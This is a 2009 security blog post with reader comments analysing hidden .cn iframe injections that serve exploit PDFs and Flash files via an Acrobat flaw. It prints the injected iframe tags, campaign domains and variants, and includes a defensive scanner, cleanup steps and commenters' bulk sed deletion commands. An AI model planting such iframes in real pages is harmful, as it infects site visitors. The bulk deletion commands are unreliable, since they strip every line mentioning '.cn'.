
Malicious “Income” IFrames from .CN Domains

15 Apr 09 | Filed in Website exploits

New week, new leader: this time it is various hidden iframes from .cn domains injected at the bottom of home pages.

The HTML code looks like this:

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names vary, but they always end in .cn and usually contain the words "lot" and "bet". They all resolve to the same server, IP address 94 .247 .3 .150. The iframes load pages with paths like “in.cgi?incomeNN”, where NN is an arbitrary number.

Here is a list of domains used in this malware campaign:


Hidden iframe detection

Like most other iframe injections, this one is easily detected by Unmask Parasites: the hidden iframes show up in the “External References” section.

lotultimatebet.cn iframe

Sometimes you can see more than one iframe injected into the same web page.

three hidden iframes: namebuypicture.cn, cutlot.cn, lotmachinesguide.cn

Safe Browsing Diagnostics

To my surprise, these iframes are poorly detected by Google. Many compromised web sites are still not listed as suspicious, and the majority of the .cn domains used in this attack are not blacklisted either. (I’ve been submitting the malicious domains to Google for the last couple of days, to no avail.)

Flagged domains

When Google does detect the malicious content, you will see the following text on the Safe Browsing diagnostic page: “Malicious software is hosted on 1 domain(s), including hyperliteautoservices .cn/”.

This happens because the initial pages in the iframes redirect to a malicious script on hyperliteautoservices .cn that checks which plugins are installed in the visitor’s browser and then serves either an infected PDF file or a Flash (swf) file (browsers open such files automatically). All of this happens behind the scenes, so visitors never know about the infection.

These files change every day, which makes virus detection very problematic. I sent both files to VirusTotal and the detection rates were very low: 5/40 for readme.pdf and 2/40 for flash.swf. None of the major anti-virus tools detected these files.

Adobe Acrobat vulnerability

I checked the PDF file with another online service called Wepawet, and it identified the malicious code and the exploited vulnerability. Here is the report. This virus makes use of a known vulnerability in Adobe Acrobat (Reader), CVE-2008-2992: “Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument”.

If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.

This PDF file silently downloads a malicious binary (a Windows executable) from litehitscar .cn, which resides on the same server as hyperliteautoservices .cn (IP 94 .247 .3 .151). According to VirusTotal, the detection rate for this malware is very low: 3/40.

How to clean up?

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on the server. The easiest way to do it is to upload clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (my Unmask Parasites can be one of them) to be sure your site is clean.
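Detection and cleanup of the iframe pattern described above and in steps 4 and 5, as an added example written for this page (it is not the Unmask Parasites code; the hostnames in the embedded sample page are constructed, and `scan_tree` is report-only):

```python
"""Scanner for the hidden .cn "in.cgi" iframes described in this post.

Added example, not the Unmask Parasites tool. It reports iframes that
point at a .cn host with an in.cgi?<keyword><NN> path (income56,
mozila7, pepsi58 ...) or that are hidden by style or 1x1-style sizing,
and can strip only the high-confidence .cn matches from a file's text.
"""
import re
from pathlib import Path

# Whole <iframe ...>...</iframe> tag; DOTALL so an injection appended to an
# existing line, or split across lines, is still matched as one unit.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
# src value, tolerating the curly quotes that appear when code is pasted into comments
SRC_RE = re.compile(r"""\bsrc\s*=\s*["'“”]?\s*(?P<url>[^"'“”\s>]+)""", re.IGNORECASE)
# http(s)://<host>.cn[:port]/[dir/]in.cgi?<letters><digits>
CN_INCGI_RE = re.compile(r"^https?://[^/:?]+\.cn(?::\d+)?/(?:[^?#]*/)?in\.cgi\?[a-z]+\d*", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)


def classify_iframe(tag):
    """Return "cn-in.cgi" (high confidence), "hidden" (needs review), or None."""
    m = SRC_RE.search(tag)
    src = m.group("url") if m else ""
    if CN_INCGI_RE.match(src):
        return "cn-in.cgi"
    dims = [int(v) for _, v in DIM_RE.findall(tag)]
    # The campaign's iframes were 1x1 and later 2x4; anything that small is suspect.
    if HIDDEN_STYLE_RE.search(tag) or (dims and max(dims) <= 4):
        return "hidden"
    return None


def find_suspicious_iframes(html):
    """List every suspicious iframe in one document with its reason and src."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        reason = classify_iframe(tag)
        if reason:
            src = SRC_RE.search(tag)
            findings.append({"reason": reason, "src": src.group("url") if src else "", "tag": tag})
    return findings


def strip_cn_iframes(html):
    """Remove only the .cn in.cgi iframes; merely hidden ones are left for manual review."""
    removed = 0

    def repl(m):
        nonlocal removed
        if classify_iframe(m.group(0)) == "cn-in.cgi":
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, html), removed


def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Report-only walk of a web root (hidden files included); nothing is modified."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = find_suspicious_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample page: one legitimate embed, one hidden non-.cn iframe,
# and two injected variants (hostnames are made up, not the campaign's).
SAMPLE_HTML = """<html><body><p>Legit page</p>
<iframe src="https://maps.example.com/embed" width="560" height="315"></iframe>
<iframe src="http://tracker.example.org/x" style="display:none"></iframe>
</body></html><iframe src="http://lotexample-bet.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://lotexample.cn:8080/ts/in.cgi?pepsi58" width=2 height=4 style="visibility: hidden"></iframe>"""

if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_HTML):
        print(f"{f['reason']:10} {f['src']}")
    cleaned, n = strip_cn_iframes(SAMPLE_HTML)
    print(f"removed {n} iframe(s)")
    # scan_tree("/var/www/vhosts")  # run against a real web root, then review before cleaning
```

The JavaScript variant mentioned in the comments (code appended to .js files) is not an iframe and is not covered by this scanner.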

If you have any additional information on this issue or want to ask a question, consider leaving a comment below.


Reader's Comments (78)

  1. |

    My site got hit by this today. Added iframes to about 70 files on a ZenCart site. Thanks for posting this info so I could get rid of it.

  2. |

    I have two message boards which show this error. My main site seems to be unaffected. For some reason, I can not find the code on my pages yet.

    • |

      The iframes are usually injected at the very bottom of HTML code. Check files like index.html, index.php, etc.

      • |

        I have a board that was hit, too. I use YaBB 2.4 open source board for the site.

        I found the injection in the default.html file within the template folder.

        • |

          BTW: in mine, the iframe was located toward the top of the page, by the header. It gave the appearance of the entire being pushed down, with extra space at the top, above the header area.

  3. |

    I have found the files on my index.html, but every time I remove them they reappear. Could a script also be placed on my root server?

    • |

      Did you scan your local computer for spyware?
      Did you change FTP passwords?

      Scanning your server for new/suspicious files is also a good idea. Don’t forget to check your server’s global /tmp directory.

    • |

      Did you end up getting this solved? Just got the issue and wanted to know what caused the problem for you and how you removed it.

  4. |

    [...] is just a link so you can read about the problem – there may well be others besides me who ended up in [...]

  5. |

    [...] IFRAME injection, and the situation here is also quite bad. Malicious “Income” IFrames from .CN Domains New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home [...]

  6. |

    [...] http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ [...]

  7. |

    I have this very problem and it's smashing all of my websites (approximately 4 that I know of). It's a f*cking nuisance – I can't seem to get rid of it. No virus scanners are picking it up, nor are they removing it!

    I can see my browser being redirected to these urls as mentioned above, and it seems I am unable to do much about it.

    I have searched the registry and local file system to no avail. I've updated Adobe Reader, Java and Shockwave. Still stuck.

    If anyone has any information on how to get rid of this crap please share it.

    • |

      Actually this exploit works silently and you shouldn’t see the redirects.

      Upgrading Acrobat Reader and Flash will only help you avoid new infections. These upgrades won’t make your system clean if it is already infected.

  8. |

    use this (straight quotes, and the dot escaped so the pattern matches a literal ".cn"):
    find /var/www/vhosts/ -maxdepth 999 -type f -name '*.html' -exec sed -i '/\.cn/ d' {} \;
    find /var/www/vhosts/ -maxdepth 999 -type f -name '*.php' -exec sed -i '/\.cn/ d' {} \;

    • |

      I assume this is for server admins

    • |

      my site has been infected too by this.

      can you please tell me what this command does and how to execute it?

      thank you

      • |

        This exact command is for global server administrators. As far as I can read it, it searches all sites on a server for files (html and php) that include references to a .cn domain.

        For an individual site owner, it’s much easier to upload clean content from a backup.

      • |

        It searches all files with the extensions .html or .php under /var/www/vhosts/ and deletes any line containing ‘.cn’.

        This probably isn’t a very good idea, unless you are sure that there are no legitimate occurrences of the string .cn

        to just search through and find any files containing it:

        find /var/www/vhosts/ -type f -name '*.html' -exec grep -H {} \;

        and the same for -name ‘*.php’, with /var/www/vhosts/ being replaced whatever your web root is.

        • |

          Ed:

          command should be :

          find /var/www/vhosts/ -type f -name '*.html' -exec grep -H '\.cn' {} \;

          Worth noting, if you have a stats program you could get a lot of hits from the files for that, i.e. every time someone visits your site from a .cn domain. Probably better searching on iframe:

          find /var/www/vhosts/ -type f -name '*.html' -exec grep -H 'iframe' {} \;

          unless you have a lot of them in your code anyway.

    • |

      it helped me: I searched for those lines in php/html files and deleted them, saves a lot of work :P

  9. |

    I have the same problem since yesterday, 21st April 2009. Damn those hackers…

    I hope I can solve this problem soon…

  10. |

    Besides cleaning a site.
    Has anyone found a way to tell if your computer is still infected or IS infected and then spreading to sites?

  11. |

    When I am opening my site in the Mozilla browser I am getting the error message "Reported Attack Site".

    Please tell me how to fix this error

  12. |

    I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  13. |

    It’s good to hear about this problem, as I use Windows in one form or another at my work for web development.

    At home, though, there shouldn’t be an issue – currently on 64-bit Ubuntu 8.10 and hoping to upgrade to 9.04 soon – good luck with the executable ever having a chance in hell of running (unless they drop an ELF binary in there, and somehow manage to find a crack around standard *nix user security)…

  14. |

    I found this url in iframe with style as visibility: hidden, on my page:

    http: // nyoflak . com /?click=33FD53
    http: // litegreatestdirect .cn /in.cgi?income72

    Anyone know about this virus? please…

    • |

      litegreatestdirect is described in this article.

      nyoflak is slightly different. It seems to be injected as PHP code. Are you using PHP?

      I think they use the same infection technique, so this article’s clean up instructions should work for both of them.

  15. |

    This thing got into both of my sites. My IT guy noticed on the 18th and has finally figured out a way to get it off my sites; it will take another day or two to complete. It was a royal pain in the ass. If you do not have a backup of your site (in my case) pre 4/16 you have a lot of work. If anyone needs help, let me know – he freelances for me and a few other places.

    Edit by Denis: I removed the site address since it is still infected.

  16. |

    I hate to say it but I am just so pissed off always starting from 0. Now that I have my sites infected, I have no idea how to clean them up. What I can't get is why the hell these fuckers are doing that... does someone pay them for doing it or is it just personal ego masturbation... I wish the Internet Crime Complaint Center would catch them and fuck them nicely.

    • |

      They do it because it’s cheap to infect thousands of computers. Then they can monetize their networks of zombies. $$$$

  17. |

    Seems to like anything that has names that include index-filenames (index, default etc…)

    Tips for passwords: get a password keeper (I use KeePass). I use the password generator and it works great.

  18. |

    I have the same problem with most of my websites (10 websites), and I got angry when I cleaned 2 and later found out I have another 2 flagged by Google. I never had this problem before and I would like to know if those iframe malwares are recent shit or not. And how did you get the virus on your computer? I know you can download them in shit programs or something else, but does anyone know exactly where I got this shit on my PC? I cleaned my PC and my websites but I had to start from 0. Thank you.

    • |

      I first noticed these “.cn” iframes less than a month ago. However, similar exploits have existed for a pretty long time.

      The easiest way to get infected is to browse web sites without due protection, i.e. without the latest OS and browser security updates and without up-to-date antivirus/antispyware software.

  19. |

    Please add those 5 domains to your list:

    litecartop.cn
    hotslotpot.cn
    cheapslotplay.cn
    superbetfair.cn
    lotante.cn

  20. |

    [...] the address varies, and the list of suspicious domains is sizeable. This one reportedly (I haven't checked!) checks for the presence of the Flash or Acrobat Reader plugin, [...]

  21. |

    Some other domains that may be mentioned on Safe Browsing diagnostic pages:

    liteautoexcellent .cn
    liteautogreatestonline .cn

  22. |

    New modification of the same exploit:
    The “mozila” keyword is used instead of the “income”.

    Here is a sample iframe code:

    <iframe src="http: //yourlitetop .cn/ts/in.cgi?mozila7" width=2 height=4 style="visibility: hidden"></iframe>

    Known domains include:


    Another modification is the banner iframes with sources from “http :// bigtruckstopseek .cn/ts/in.cgi?banner2”

    giantbest .cn
    findbigname .cn
    gianttopseek .cn
    findbigwords .cn

    May 12: new pepsi modification http :// findbigboob .cn:8080 /ts/in.cgi?pepsi


  23. |

    [...] featherlitecarcare.cn : forward DNS lookup fails. Or rather, blocking on a domain basis is endless. Malicious “Income” IFrames from .CN Domains — Unmask Parasites. Blog. * lotultimatebet .cn * lotmachinesguide .cn * cheapslotplay .cn * lotultimatebet .cn * cutlot .cn [...]

  24. |

    I am also facing a problem with iframe malware. I have a server that has multiple sites hosted. Is there any solution so that I may restrict these viruses from entering the machine?

  25. |

    [...] http://www.pcadvisor.co.uk/news/index.cfm?newsid=12422 http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/ http://www.webmasterworld.com/google/3486931.htm [...]

  26. |

    [...] suspensions – they have among other measures enabled SFTP and started blocking .cn domains – Malicious “Income” IFrames from .CN Domains | Unmask Parasites. Blog. Has glowhost SFTP enabled for shared accounts [...]

  27. |

    How can I block ALL .cn websites from both my computer and from my websites?

    On my computer, this would include anything in addition to the basic html page, scripts or ads, banner ads, anything.

    Individually, I use the hosts file and security list on Tools, but how can I ban the entire toplevel domain?

    Spent 2 days cleaning my site from redirect — how to code to prevent another attack?

  28. |

    Hi,
    I had the same problem with my sites.
    I also saw my .js files are infected. There is added JavaScript code on the last row!

  29. |

    [...] | 20:13 | #11 I think it happened because of Adobe Reader: this script is explained at http://blog.unmaskparasites.com/2009…om-cn-domains/. And unfortunately not many AVs recognize this virus either: [...]

  30. |

    I was first hit with this on April 16th. Since then I have cleaned dozens of sites. Seems to be a virus / worm that infects your machine and sends any FTP usernames and passwords to some place in China and god knows where else.

    I contacted Norton and had them scan my machine. They said it was clear. Since then I have been cleaning sites and changing FTP passwords and not storing them locally.

    I had copies of all the offending code stored in a text file on my desktop so I could easily copy it and search an infected site to clean it. The code ranged from iframes, to php, to js.

    This morning my Norton went nuts and removed the file I had stored with copies of the code. This was ONE MONTH + 3 DAYS after I contacted them and, over live help, submitted copies of the infection to them AND even gave them this site to look at.

  31. |

    I’m sure that most of us abandoned the IFRAME tag long ago, and the only instance is this virus.

    Can someone write a piece of code that searches files, and simply deletes everything from to ?

    (It can’t simply delete that LINE of code, because I’ve noticed it’s not always on a new line in the code)

    Thanks! That would be a life saver.

  32. |

    It lost my code, I’ll retype with brackets:

    Can someone write a piece of code that searches files, and simply deletes everything from [iframe] to [/iframe] to ?

  33. |

    Help me please someone.

    I uploaded my site on freehostia.com. It was working fine but recently it stopped working. I saw these two iframe codes injected in the bottom of my index.php file.
    <iframe src=”http://lotmachinesguide.cn/in.cgi?income56″ width=1 height=1 style=”visibility: hi

    I am using the Joomla platform for my website. Please suggest how I can find the infected files and the best possible way to get rid of it.

    Please please do mail me the solution

    Thanks
    vikrant

  34. |

    Hello,

    Does anybody know how to prevent such attacks in the first place?

    Manish

    Edit by Denis: I removed your site link from your signature since the site is still infected http://www.UnmaskParasites.com/security-report/?page=excellencetechnologies.in

  35. |

    The same IFRAME hack attacked about 5 of my websites, which are at different hosts (1und1 and united-domains.com). I am a rather private person with not much knowledge about computers and my admin left. Maybe anyone is out there who could help me to rescue my websites and clean them from this fucking virus. Of course I would pay him, but I really don’t have a clue what I can do to use my websites again.....

    Please help me !

    Markus

  36. |

    Your computer gets infected when you open any website already infected with these hidden iframes.

    This happened to me once, and it stole away all my stored FTP passwords from my filezilla FTP program.

    In all those sites, it added the hidden iframe to index.html and index.php files.

    If it's an index.php and you have PHP code in it, most probably it will break your website and show you some errors. That is how I found out about the added iframes on my pages.

    But if your pages are index.html, then the iframe addition will not break your site, and you will not notice it, but all users to your website will be infected.

    The iframe that I was infected with had a “nameashop .cn” domain.

    The best thing you can do is block all .cn domains in your Windows hosts file if you are using one. Since I never visit any .cn sites, it’s no problem for me.

    I wonder if this stole away just my FTP passwords, or did it steal other passwords too. Anyone in here lost other passwords?

  37. |

    I also got hit with my sites.

    is it FileZilla FTP program problem or what?

    Are we safer if we use another FTP program?

    Mike

  38. |

    hi,
    I give you a script (PHP) which records all files present on your FTP and lists in an HTML table the files infected by a line which looks like this:

    visibility: hidden
    .cn
    onload
    onunload
    eval

    Place this script in a php file (for example “iframe_work.php”) and put it on your FTP.
    Launch it and see the infected files.

    Find the script here :
    http://internet.umour.free.fr/script.txt

    (sorry for english, i’m french :>)

  39. |

    I’ve been dealing with this non-stop for a couple weeks…at least 5 sites so far. If anyone has a tool that will get rid of and block this locally/permanently that would be great.

    Thanks.

  40. |

    [...] to be of a larger scale and has meanwhile also reached the Google forum. The list of (mostly) .cn domains that are referenced is [...]

  41. |

    I made this to delete all the files infected:



  42. |

    Hi all! I experienced the same problem on all sites I have access to. Now I have cleaned them, reinstalled my system and changed the accounts, but still I’m not sure whether the “animal” hides somewhere on my computer, as I first installed Adobe CS3 with the “damaged” version of Acrobat and upgraded it later. Does anybody know any antivirus software which can detect it?
    //excuse my English, I’m Bulgarian

  43. |

    There seems to be a new variant of this now. I have seen several sites injected with:
    Like the old one, the 58 will change from site to site.

    • |

      I guess it didn’t want to take that code block. The iframe source is now: http: //lotwager .cn:8080/ts/in.cgi?pepsi58

    • |

      Indeed, there have been various modifications of this iframe attack. I’m trying to add new domain names in this comment.

      “58″ corresponds to lotwager. Other numbers correspond to the malicious domains.

  44. |

    Many of the sites I manage have been hit with this, causing me a LOT of problems.

    Does anyone know how to permanently remove this? I have tried AVG, Avast, Spybot, and Malwarebytes, but my sites continue to be attacked, even after changing the FTP passwords, so I must still have the virus. I wonder if by visiting my infected sites with my browser, am I re-infecting myself?

    Does this virus actually have a name?

  45. |

    Hi ,
    Thanks to Laurent (thank you, your checklist is really cool, I'm French too) and to everybody there ;-)

    I have just been infected for 4 days by this (new, very aggressive) worm that stole all FileZilla accounts and changed every index page with an injected code (I realized that passwords aren’t encrypted in FileZilla!! So now I type the password myself...

    (I write in frenglish perhaps, sorry…)

    For those who suspect their windows to be infected :
    I’ve made (make? making? oops) a shortcut to this folder and check it every time (especially before you shut down – I have become ‘paranoid’):

    “C:\Documents and Settings\mon_user_name\Menu Démarrer\Programmes\Démarrage”

    In english …/yourusername/programs/start menu

    If you see a file named “rncsys32.exe”, then you are infected !

    Kill it, clear all temp in win and others temp folders and apply Laurent’s procedure.

    If some readme.pdf appears on the desktop or.., you are infected..

    That’s my sad today’s experience.

    (Personally, I don’t understand how a php page can infect our Windows....?)

    Good luck !

  46. |

    [...] first sidestepping technique is to use a nonstandard port. There have been lots of .cn-targetted iframes injected recently, and their latest trick is to use port 8080 instead of 80. Why is this effective? It’s [...]

  47. |

    When I do a Google search to find my site www . neolinkinternational . com, it shows right at the top of the list; however there is a message there saying this site is infected and could infect anybody who tries to access it. I already talked to my IT person responsible for my site and he said that he cleaned it and there is no more virus on my site, but the message saying that the site is infected is still there when I use Google search. Please let me know what I should do to fix this problem. Thanks very much.
    Manoel Baiao

  48. |

    [...] is an older article/blog post, it does not mention these new .cn domains, but still good info: Malicious “Income” IFrames from .CN Domains | Unmask Parasites. Blog. Does anyone have any additional information about this hack and how to eliminate this threat 100%? [...]

  49. |

    [...] information about this attack is available in this blog on Unmask Parasites regarding Malicious "Income" IFrames from .CN [...]

  50. |

    Thanks, great info… my other site had been infected by a malicious code (iframe), but cleaned already. You can also add this suspicious site:
    hostads .cn